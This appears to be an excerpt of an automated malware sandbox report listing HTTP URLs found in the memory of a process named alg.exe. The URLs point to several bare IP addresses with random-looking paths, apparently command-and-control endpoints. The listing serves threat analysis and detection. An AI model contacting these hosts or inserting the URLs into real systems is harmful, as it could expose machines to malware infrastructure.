                        Source: alg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/O
                        Source: alg.exe, 00000005.00000003.2621213116.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2708373210.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2773708349.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2669933331.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2756072991.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2744437728.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2727806558.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2697962787.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2652374173.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2687212186.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2661319349.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/bmriyxm
                        Source: alg.exe, 00000005.00000003.2609540931.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2633585964.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3114457566.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2621213116.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2708373210.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2773708349.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2669933331.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2756072991.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2744437728.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2727806558.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2697962787.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2652374173.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2687212186.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2661319349.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/bmriyxmings
                        Source: alg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/cpggj
                        Source: alg.exe, 00000005.00000003.2609540931.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/gs
                        Source: alg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/gs#
                        Source: alg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3198048536.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3170824073.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3184983219.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3285380290.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3264636992.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3238419493.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/sbplnevnaxjj
                        Source: alg.exe, 00000005.00000003.2609540931.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2633585964.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2621213116.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/sy
                        Source: alg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/vb
                        Source: alg.exe, 00000005.00000003.2609540931.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/x
                        Source: alg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3198048536.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3170824073.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3184983219.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3285380290.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3264636992.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3238419493.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/xflcwjjwcbmih
                        Source: alg.exe, 00000005.00000003.2609540931.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/yN;
                        Source: alg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/ywcfdqaloklmslqo
                        Source: alg.exe, 00000005.00000003.3170824073.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/sbplnevnaxjjwuP
                        Source: alg.exe, 00000005.00000003.2608413194.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2607417576.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/syiyxm
                        Source: alg.exe, 00000005.00000003.2499966144.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2498837288.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/ywcfdqaloklmslqo
                        Source: alg.exe, 00000005.00000003.2835349419.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2834833089.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2833788720.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/usismcqqdljny
                        Source: alg.exe, 00000005.00000003.3049728278.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3137902301.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3081966970.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3159455853.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3067889124.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3100171023.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3160342270.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3098884658.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3083445109.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/ydpeotimwcfnewh
                        Source: alg.exe, 00000005.00000003.3225758678.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185:80/cm
                        Source: alg.exe, 00000005.00000003.2833788720.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185:80/usismcqqdljnyP
                        Source: alg.exe, 00000005.00000003.3051194132.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185:80/ydpeotimwcfnew
                        Source: alg.exe, 00000005.00000003.2574988059.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/LwX
                        Source: alg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2574988059.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/fgdugwxcbebce
                        Source: alg.exe, 00000005.00000003.3108228485.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34:80/cngodyfv0
                        Source: alg.exe, 00000005.00000003.2568800965.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2575803355.00000000004A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34:80/fgdugwxcbebce
                        Source: alg.exe, 00000005.00000003.2810336470.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34:80/mshapsve
                        Source: alg.exe, 00000005.00000003.2621213116.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2773708349.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2756072991.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/
                        Source: alg.exe, 00000005.00000003.2894467056.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2926285208.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2904771126.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2876372405.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2924610727.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/bwancadkaqtlbxq
                        Source: alg.exe, 00000005.00000003.2773708349.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2756072991.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/cgfpujhdo
                        Source: alg.exe, 00000005.00000003.2621213116.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/i
                        Source: alg.exe, 00000005.00000003.2621213116.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/ings
                        Source: alg.exe, 00000005.00000003.2633585964.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2621213116.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/p
                        Source: alg.exe, 00000005.00000002.3323105151.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/vnhoP#
                        Source: alg.exe, 00000005.00000003.2755280881.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2753891566.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45:80/cgfpu
                        Source: alg.exe, 00000005.00000003.2621894135.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2620220800.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45:80/i
                        Source: alg.exe, 00000005.00000003.2802192029.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45:80/vne
                        Source: alg.exe, 00000005.00000003.3196824104.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45:80/vnho
                        Source: alg.exe, 00000005.00000003.2475832779.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/
                        Source: alg.exe, 00000005.00000003.2475832779.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/icvb
                        Source: alg.exe, 00000005.00000003.2475832779.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/icvbc5fa
                        Source: alg.exe, 00000005.00000003.3049728278.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3039039021.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2994346081.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3198048536.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3014767523.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2958285127.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3137902301.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3081966970.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3170824073.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3184983219.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2960157911.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/qowwyqvurlxrxabk
                        Source: alg.exe, 00000005.00000003.2474029664.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2475511153.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160:80/icvb
                        Source: alg.exe, 00000005.00000003.2939549451.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160:80/qowwyqvurlxrxabk
                        Source: alg.exe, 00000005.00000003.3081966970.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3080566759.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160:80/tfuhaffhj
                        Source: alg.exe, 00000005.00000003.2574988059.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2560315871.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/
                        Source: alg.exe, 00000005.00000003.2560315871.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/txk
                        Source: alg.exe, 00000005.00000003.2560315871.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2621213116.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2708373210.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2669933331.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2727806558.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2697962787.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2652374173.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2687212186.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2661319349.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/vvpppdyli
                        Source: alg.exe, 00000005.00000003.2560315871.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/vvpppdylings
                        Source: alg.exe, 00000005.00000003.2559657639.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200:80/vvpppdyli
                        Source: alg.exe, 00000005.00000003.2420996108.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2438061645.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/
                        Source: alg.exe, 00000005.00000003.2181861289.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2181313239.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105//
                        Source: alg.exe, 00000005.00000003.2421364608.0000000000436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/S5C
                        Source: alg.exe, 00000005.00000003.2669009554.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2698840513.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2696891139.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/alkfibvhvyencmw
                        Source: alg.exe, 00000005.00000003.2420996108.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/b
                        Source: alg.exe, 00000005.00000003.2411057350.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2420996108.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2438061645.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/bsne#
                        Source: alg.exe, 00000005.00000003.2538471760.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/daho
                        Source: alg.exe, 00000005.00000003.2538471760.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ggj
                        Source: alg.exe, 00000005.00000002.3323105151.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/gs
                        Source: alg.exe, 00000005.00000003.2181740878.000000000048E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2181313239.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2181120548.000000000048D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ioqv
                        Source: alg.exe, 00000005.00000003.2181313239.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ioqvUwS
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2181861289.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2181313239.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2420996108.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ngs
                        Source: alg.exe, 00000005.00000003.2181313239.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/oqvg
                        Source: alg.exe, 00000005.00000002.3323105151.0000000000436000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3323105151.0000000000440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/q
                        Source: alg.exe, 00000005.00000003.2411057350.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/rkqsyeybt
                        Source: alg.exe, 00000005.00000003.2411057350.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/rkqsyeybtngs
                        Source: alg.exe, 00000005.00000002.3323105151.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/rubmfur
                        Source: alg.exe, 00000005.00000002.3323105151.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/s3
                        Source: alg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3198048536.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3184983219.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3285380290.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3264636992.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3238419493.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/snxddmvolovsghk
                        Source: alg.exe, 00000005.00000003.3184983219.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3196824104.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3212252460.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/snxddmvolovsghkF
                        Source: alg.exe, 00000005.00000003.2420603880.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2420996108.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2421364608.0000000000440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/wpydads
                        Source: alg.exe, 00000005.00000003.2420996108.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/wpydadsingsXwL
                        Source: alg.exe, 00000005.00000003.2669009554.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/alkfibvhvyencmw
                        Source: alg.exe, 00000005.00000003.2181276823.00000000004AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/ioqv
                        Source: alg.exe, 00000005.00000002.3335222393.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/q
                        Source: alg.exe, 00000005.00000003.3023493626.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/qirtwake
                        Source: alg.exe, 00000005.00000003.2410749727.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/rkqsyeybt
                        Source: alg.exe, 00000005.00000003.3283417082.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/rubmfur
                        Source: alg.exe, 00000005.00000003.3186324028.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/snxddmvolovsghkPp
                        Source: alg.exe, 00000005.00000003.2421987511.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2420603880.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2422385041.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/wpydads
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2866841244.00000000004C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/4s
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/b
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/kqmqy
                        Source: alg.exe, 00000005.00000003.2864839335.00000000004D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/obphwwtyxwxyphq
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/qmqy
                        Source: alg.exe, 00000005.00000003.3114457566.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/tmdyfv
                        Source: alg.exe, 00000005.00000003.2773708349.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/wcjgm
                        Source: alg.exe, 00000005.00000003.2896087461.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/ix0
                        Source: alg.exe, 00000005.00000003.2389205186.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2387874066.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/kqmqy
                        Source: alg.exe, 00000005.00000003.2864839335.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/obphwwtyxwxyphqP
                        Source: alg.exe, 00000005.00000003.3098884658.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/tmdyfv0
                        Source: alg.exe, 00000005.00000003.2771431034.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2772930707.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/wcjgm
